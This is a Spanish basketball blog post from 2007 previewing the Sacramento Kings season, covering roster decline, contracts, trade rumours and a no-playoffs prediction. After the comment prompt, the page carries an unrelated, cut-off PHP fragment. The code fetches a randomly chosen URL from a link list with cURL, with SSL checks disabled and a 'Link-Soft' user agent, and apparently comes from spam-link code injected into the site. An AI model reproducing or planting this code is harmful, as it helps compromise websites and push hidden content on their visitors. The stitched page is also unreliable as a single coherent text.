Sacramento Kings: época de despachos.

11 de November de 2007 por Gallis

La historia de los Sacramento Kings en la primera década de este nuevo siglo se asemeja a la del personaje protagonista de “Macht Point”, una de las últimas obras de arte firmada por el genio de la gran manzana Woody Allen. Sólo que en esta ocasión podría decirse que el anillo cayó al río. Quizá si el arbitro hubiera pitado falta a Kobe Bryant, quizá si Shaq hubiera anotado y el partido hubiera ido a la prorroga, quizá si Divac no hubiera tocado el balón… Lo único claro es que en la capital de California nunca olvidarán aquel triple de Robert Horry. Si no hubiera entrado, quizá la dinastía más grande de la década sería monárquica.

 El caso es que poco queda ya de aquel equipo que a todos nos maravilló: Bibby – Christie – Pedja – Webber – Divac formaban una de esas alineaciones que todo aficionado al baloncesto recordará siempre. Ayudados por Bobby Jackson, Turkoglu o Pollard, los de Rick Adelman consiguieron 61 victorias en 2002 y nos divirtieron a todos. Pero poco queda ya de aquella época de esplendor. Tan solo la presencia de Mike Bibby en la plantilla recuerda los días dorados a los aficionados del Arco Arena. Desde entonces, los Kings han alternado decisiones acertadas, como la adquisición de Brad Miller, con traspasos más cuestionables. Esto, junto con la marcha de prometedores agentes libres y alguna retirada acabó mermando el potencial de un equipo que el año pasado volvió a ver, por primera vez en años, los Playoffs por televisión.

Mike Bibby, Kevin Martin y el siempre polémico Ron Artest lideran un equipo que esta pretemporada se ha reforzado muy poco. Tan solo la llegada de Mikki Moore, quién supo aprovechar los minutos que tuvo en New Jersey tras la lesión de Kristc, podría calificarse como refuerzo. Hawes, Greene, Watkins y Beno Udrih completan el elenco de caras nuevas. Ante este panorama, no es difícil colegir que el debut en el banquillo de Reggie Theus no será un camino de rosas. Clasificar a Sacramento para la postemporada sería un aval incontestable para darle el premio al mejor entrenador del año. Más todavía teniendo en cuenta que Bibby será baja, al menos, los 2 primeros meses de temporada.

La de Sacramento es una plantilla veterana y sobrepagada. Hombres como Kenny Thomas y Shareef Abdur-Rahim son jugadores en clara decadencia, pero que en la temporada 2009/2010 aún cobrarán casi 15 millones de dólares entre los dos. Mientras, otros dos clásicos como Bibby y Brad Miller aún parecen tener baloncesto suficiente, pero su rendimiento es pobre. Quién sabe si lo que necesitan es un cambio de aires.

Así las cosas, Artest y Kevin Martin, un jugador que ya parece preparado para asumir el papel protagonista, son los depositarios de las esperanzas del ARCO Arena. Desde el banco, tan solo Salmons y, en menor medida, Douby y Garcia parecen en disposición de aportar.

Esta temporada se antoja crucial para la franquicia de los hermanos Maloof. Kevin Martin acaba contrato y si el panorama sigue como está, parece improbable que continúe en Sacramento. Bibby y Artest estuvieron a punto ser traspasados el pasado mes de febrero y sus nombres siguen siendo habituales en las páginas de rumores. Sin duda se antoja una buena solución, si se hace bien, para un equipo que necesita como agua de mayo caras nuevas y liberar salario. Los despachos serán vitales para que quedarse fuera de los Playoffs no se convierta en una triste costumbre.

Quinteto inicial: Bibby, Martin, Artest, Moore y Miller.

Sexto hombre: Salmons.

Predicción: Fuera de Playoffs.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>